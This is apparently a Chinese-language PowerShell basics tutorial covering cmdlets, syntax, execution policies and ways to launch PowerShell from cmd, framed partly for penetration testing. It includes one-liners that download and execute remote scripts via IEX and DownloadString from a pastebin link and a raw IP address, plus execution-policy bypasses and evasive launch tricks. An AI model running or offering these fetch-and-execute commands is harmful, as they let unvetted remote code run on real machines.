Powershell基础

Powershell基础

Powershell简介

  1. 什么是 Windows PowerShell
  • Windows PowerShell 是 Microsoft 创建的基于任务的自动化命令行Shell和相关脚本语言,基于 .NET 框架。

  • 是Microsoft的新Shell,它将旧的命令提示符(CMD)功能与具有内置系统管理功能的新脚本指令集结合在一起。

  • 用于控制和自动化管理Windows操作系统和运行在操作系统上的应用。

  • 被广泛用于渗透测试等方面,在不需要写入磁盘的情况下执行命令,也可以逃避 Anti-Virus 检测。

  • Windows PowerShell 中的命令称为 cmdlet ,发音为“ command-lets ”,其中每个 cmdlet 代表特定的功能或基于任务的脚本。

  • Powershell 默认安装在Win7及以后的系统上。

  • 操作系统信任,提供Windows操作系统的几乎一切访问权限

  • Windows PowerShell 集成脚本环境(ISE)

  1. 为什么使用 Windows PowerShell
  • 它既是脚本语言,又是命令行Shell。它可以与不同数量的技术进行交互。

  • Windows PowerShell允许完全访问.NET框架中的所有类型。PowerShell是基于对象的。

  • Microsoft为各种产品设计的GUI的许多接口是PowerShell的前端接口。

  • 它比运行VBScript或其他脚本语言更安全。

  • 通过组合多个命令和编写脚本,它可以更有效地执行重复性任务。假设系统管理员希望创建数百个活动目录用户,那么他只能借助脚本中放置的某些 PowerShell cmdlet 来实现此目的。

  • 使用PowerShell的简单cmdlet可以在一秒钟内完成许多复杂且耗时的配置和任务。

  1. 如何启动 Windows PowerShell

所有最新版本的 Windows 中都可以使用 PowerShell 。

我们需要按照给定的步骤启动 PowerShell :搜索 Windows PowerShell 。选择并单击。 PowerShell窗口将打开。

  1. PowerShell和Cmd命令提示符的区别?
PowerShell Cmd命令提示符
它是基于.NET框架的基于任务的自动化命令行界面和关联的脚本语言。 它是Microsoft Windows操作系统的默认命令行解释器。
它可以解释批处理和PowerShell命令。 它只能解释批处理命令。
它用于控制和自动化Windows服务器上的应用程序和Windows操作系统 它用于在控制台上执行给定的命令,可用于调试问题。
PowerShell生成的输出不仅是字符流,而且是对象的集合。 命令提示符生成的输出只是字符流(文本)。
它既是Shell程序又是脚本编制环境,它支持创建用于管理Windows操作系统的大文件 它只是一个shell系统,它允许用户仅执行简单和基本的脚本来执行批处理文件。
  1. 管理员运行 PowerShell

在Windows操作系统中,有五种方法可以以管理员身份运行PowerShell:

1、使用运行窗口(对于所有版本的Windows),以管理员身份运行PowerShell。
2、使用Cortana搜索栏(对于Windows 10)以管理员身份运行PowerShell。
3、在命令提示符下以管理员身份运行PowerShell。
4、从任务管理器以管理员身份运行PowerShell。
5、从“开始”菜单以管理员身份运行PowerShell。

6.Windows PowerShell ISE

Microsoft Windows PowerShell ISE 是基于图形用户界面的应用程序,并且是Windows PowerShell的默认编辑器。

ISE代表集成脚本环境。它是一个界面,我们可以在这个界面中运行命令以及编写,测试和调试PowerShell脚本,而无需在命令行界面中编写所有命令。

集成脚本环境(ISE)提供选项卡补全,多行编辑,语法着色,上下文相关帮助,选择性执行以及对从右到左语言的支持。

PowerShell的ISE窗口包含以下三个窗格:

  • 脚本窗格:此窗格允许用户创建和运行脚本。 用户可以在脚本窗格中轻松打开,编辑和运行现有脚本。

  • 输出窗格:此窗格显示脚本的输出以及运行的命令。还可以清除并复制“输出”窗格中的内容。

  • 命令窗格:此窗格允许用户编写命令。在命令窗格中轻松执行单行或多行命令。

创建并运行脚本

文本编辑器创建脚本

打开任意文本编辑器,写入测试脚本内容:

1
echo "Hello world"

保存文件名为 test.ps1,双击即可运行!

集成脚本环境创建脚本

打开 Windows PowerShell ISE ,新建一个空文件,写入要执行的脚本内容,保存文件名为test.ps1

菜单栏点击运行,或快捷键 F5 运行脚本

加载执行本地脚本

1
powershell -f test.ps1  #需要指定路径

加载执行远程脚本

Powershell 远程下载代码脚本执行

1
powershell -c "Invoke-Expression (New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/M676F14U')"
1
powershell -c "Invoke-Expression (New-Object System.Net.WebClient).DownloadString('http://139.155.49.43:8000/cmd')"
1
2
3
4
5
6
Invoke-Expression(IEX的别名):用来把字符串当作命令执行。
WindowStyle Hidden(-w Hidden):隐藏窗口
Nonlnteractive(-NonI):非交互模式,PowerShell不为用户提供交互的提示。
NoProfile(-NoP):PowerShell控制台不加载当前用户的配置文件。
Noexit(-Noe):执行后不退出Shell。
EncodedCommand(-enc): 接受base64 encode的字符串编码,避免一些解析问题

WebClient 类:提供用于将数据发送到由 URI 标识的资源以及从这样的资源接收数据的常用方法。

https://learn.microsoft.com/zh-cn/dotnet/api/system.net.webclient?view=net-6.0

DownloadString 方法:以 String 形式下载请求的资源。 可以以包含 URI 的 String 或 Uri 的形式指定要下载的资源。

https://learn.microsoft.com/zh-cn/dotnet/api/system.net.webclient.downloadstring?view=net-6.0

脚本执行策略

在计算机系统中启动PowerShell时,默认执行策略不允许我们执行或运行脚本。

查看当前执行策略

1
Get-ExecutionPolicy

获取影响当前会话的所有执行策略,并按优先顺序显示它们

1
Get-ExecutionPolicy -List

将执行策略设置为 Bypass

1
Set-ExecutionPolicy Bypass

#需要使用管理员权限启动power shell

对特定的用户执行策略设置

1
Set-ExecutionPolicy Unrestricted -Scope LocalMachine

详细查看: https://learn.microsoft.com/zh-cn/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3

PowerShell中可以设置以下类型的执行策略:

名称 说明
AllSigned AllSigned允许执行所有具有数字签名的脚本。
Bypass 不阻止任何操作,并且没有任何警告或提示
Default 设置默认执行策略。Restricted 适用于 Windows 客户端。为 Windows 服务器远程签名
RemoteSigned 允许执行具有数字签名的通过网络下载的脚本;本地创建的脚本不要求脚本具有数字签名,可以直接执行。
Restricted 受限制的,可以执行单个的命令,但不能执行脚本,执行就会报错,Windows8,Windows 8.1,Windows Server 2012中默认策略。
Undefined Undefined 表示没有设置脚本策略。当然此时会发生继承或应用默认的脚本策略。
Unrestricted 允许运行未签名的脚本。从网络上下载的脚本,在运行前会进行安全性提示。需要确认是否执行脚本。

Bypass 最为常用

详细查看
https://learn.microsoft.com/zh-cn/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.3

绕过执行策略

  • 本地读取然后通过管道符运行
1
powershell get-content a.ps1 | powershell -noprofile -
  • 远程下载并通过IEX运行脚本
1
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://xxx.xxx.xxx/a.ps1')"
  • Bypass执行策略绕过
1
powershell -executionpolicy bypass -File ./a.ps1
  • Unrestricted执行策略
1
powershell -executionpolicy unrestricted -File ./a.ps1

PowerShell注释

  • 单行注释

单行注释是在每行的开头键入井号 # 的注释。 # 符号右边的所有内容都将被忽略。 如果在脚本中编写多行,则必须在每行的开头使用井号 # 符号。

1
#单行注释.............
  • 多行注释

要注释多行,请将 <# 符号放在第一行的开头,将 #> 符号放在最后一行的末尾。

1
2
3
<# 多行注释.........  
多行注释.........
多行注释....................#>

PowerShell Cmdlet

Cmdlets 是 PowerShell 的非常重要的内部命令集。

Cmdlet 发音为” command-lets ”,它是在 PowerShell 环境中使用的轻量级命令。 这些是在PowerShell环境中实现特殊功能的特殊命令。

Cmdlet 遵循“动词-名词”模式,例如: set-childItem

Cmdlet 是以 .NET 类实例形式存在的命令。 Cmdlets 可以用任何 .NET 语言来编写,也可以用PowerShell 脚本语言来编写。

它并不是简单的可执行文件,它有很多属性,这些属性用来指定输入参数或者使用管道来管理重定向。我们可以通过输入 Get-Command 可以显示可用的 Cmdlets 命令。

1
Get-Command -CommandType Cmdlet

常用Cmdlet命令

  • 查看 powershell 版本
1
2
3
$PSVersionTable

Get-Host
  • 查看当前环境变量
1
2
3
4
5
Get-ChildItem env:

gci env:
ls env:
dir env:
  • 启动指定程序
1
2
3
4
Start-Process calc.exe

saps calc.exe
start calc.exe
  • 获取指定进程信息
1
2
3
4
Get-Process
Get-Process explorer

#别名 gps ps
  • 获取文件信息
1
2
3
Get-Item 1.txt

#别名 gi
  • 复制文件
1
2
3
Copy-Item 1.txt 2.txt

#别名 cpi cp copy
  • 移动文件
1
2
3
Move-Item 1.txt 2.txt

#别名 mi mv move
  • 获取指定服务信息
1
Get-Service -Name Everything
  • 获取文件Hash
1
2
Get-FileHash -Algorithm SHA1 1.txt
Get-FileHash -Algorithm MD5 1.txt
  • 设置文本内容
1
2
3
Set-Content 1.txt -Value "hello, word"

#别名 sc
  • 删除文件的内容,但不删除该文件
1
Clear-Content 1.txt
  • 获取当前目录
1
2
3
Get-Location

#别名gl pwd
  • 查看别名
1
Get-Alias -name dir

基本语法

  • 管道符
1
|     #将一个命令的输出作为另一个命令的输入
  • 分号
1
;   #分号用来连续执行系统命令
  • 调用操作符
1
&   ##调用操作符,它允许你执行命令,脚本或函数
  • 输出单双引号
1
2
3
""""   #输出双引号

'''' # 输出单引号
  • 运输符
1
2
3
4
5
6
7
8
9
>   :将输出保存到指定文件中(用法:Get-Process > output.txt)
>> :将脚本的输出追加到指定文件中(用法:test.ps1 >> output.txt)
2> :将错误输出到指定文件中(Get-Porcess none 2> Errors.txt)
2>> :将错误追加到指定文件中(Get-Process none 2>> logs-Errors.txt)
-eq :等于运算符(用法:$var1 –eq $var2,返回真或假)
-gt :大于运算符(用法:$var1 –gt $var2,返回真或假)
-match :匹配运算符,搜索字符串是否在文中出现(用法:$Text –match $string,返回真或假)
-replace :替换字符串(用法:$Text –replace 被替换的字符,替换的字符,返回真或假)
-in :测试一个字符或数字是否出现在文本中或列表中,声明列表直接使用()
  • 变量

变量都是以 $ 开头

1
2
$w = "hello world"   # 变量赋值
$w # 访问变量

数组

1
2
3
4
$a = 'value1','value2','value3'     # 创建数组
$a[0] # 访问数组第一个元素
$a = @() # 空数组
$a = 1,'two',(get-date)

语句

  1. 条件语句
1
2
if($var {comparison_statement} $var2) {What_To_Do}
else {what_to_if_not}
  1. 循环语句
1
2
3
while() {}
Do {} While()
For(;;;) {}

Cmd启动Powershell

常规方法

1
2
3
cmd.exe /c "powershell -c Write-Host SUCCESS -Fore Green"

cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell -"

管道输入流

1
2
3
cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell IEX $input"

cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell -"

环境变量

1
2
3
4
5
6
7
cmd.exe /c "set cmd=Write-Host SUCCESS -Fore Green && powershell IEX $env:cmd"

cmd.exe /c "set cmd=Write-Host SUCCESS -Fore Green && cmd /c echo %cmd% | powershell -"

cmd.exe /c "set cmd=Write-Host SUCCESS -Fore Green && powershell IEX ([Environment]::GetEnvironmentVariable('cmd', 'Process'));"

cmd.exe /c "set cmd=Write-Host SUCCESS -Fore Green&&powershell IEX ((Get-ChildItem env:cmd).Value)"

从粘贴板执行

1
cmd.exe /c "echo Write-Host CLIP -Fore Green | clip && powershell [void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); IEX ([System.Windows.Forms.Clipboard]::GetText())"

bat脚本执行

1
2
3
@echo off
powershell -c Write-Host SUCCESS -Fore Green
pause